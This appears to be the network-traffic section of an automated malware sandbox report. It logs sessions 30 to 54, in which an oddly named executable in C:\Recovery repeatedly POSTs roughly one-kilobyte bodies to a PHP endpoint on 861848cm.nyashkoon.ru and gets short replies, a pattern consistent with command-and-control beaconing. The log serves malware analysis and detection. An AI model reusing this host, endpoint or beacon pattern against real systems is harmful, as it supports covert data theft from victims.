                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:43.625706911 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:44.085262060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:44.162945986 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.4 | 49771 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:44.282577038 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:44.641364098 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:45.097348928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:45.177006960 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.4 | 49772 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:45.305135965 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:45.658005953 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:46.127073050 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.4 | 49773 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:46.138686895 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:46.485275030 CET | 1252 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:46.951426029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:47.029788017 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.4 | 49774 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:46.585927010 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:46.938522100 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:47.401441097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:47.478071928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.4 | 49775 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:47.594944954 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:47.953941107 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:48.414443970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:48.492225885 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.2.4 | 49776 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:49.201839924 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:49.547601938 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:50.004352093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:50.080535889 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.2.4 | 49777 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:50.212451935 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:50.563333988 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:51.015120983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:51.093040943 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.2.4 | 49778 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:51.219505072 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:52.037761927 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.2.4 | 49779 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:52.038177013 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:52.848625898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:52.922964096 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.2.4 | 49780 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:52.225567102 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:53.036077976 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:53.109078884 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    40 | 192.168.2.4 | 49781 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:53.237962961 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:54.057194948 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:54.136538029 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.2.4 | 49782 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:54.683142900 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:55.518467903 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:55.587086916 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    42 | 192.168.2.4 | 49783 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:55.741463900 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:56.569845915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:56.643273115 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    43 | 192.168.2.4 | 49785 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:57.352922916 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.2.4 | 49786 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:57.944560051 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:58.759608030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:58.827132940 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.2.4 | 49787 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:58.065220118 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:58.876014948 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:58.951745987 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.2.4 | 49789 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:59.087606907 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:59.899265051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:59.976402998 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    47 | 192.168.2.4 | 49790 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:00.340729952 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:01.167135000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:01.246028900 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.2.4 | 49796 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:01.411005020 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:02.220505953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:02.300837994 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    49 | 192.168.2.4 | 49802 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:02.599716902 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:02.959175110 CET | 1008 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:03.401977062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:03.480639935 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    50 | 192.168.2.4 | 49808 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:03.721577883 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:04.079330921 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:04.534209013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:04.602958918 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    51 | 192.168.2.4 | 49809 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:03.851068974 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:04.203969955 CET | 1252 | OUT | [request body]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    52 | 192.168.2.4 | 49815 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:04.782592058 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:05.141393900 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:05.594321966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:05.664218903 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    53 | 192.168.2.4 | 49821 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:06.166851044 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:06.516539097 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:06.976986885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:07.056188107 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    54 | 192.168.2.4 | 49827 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:07.175524950 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:07.532018900 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:07.986022949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:08.062239885 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


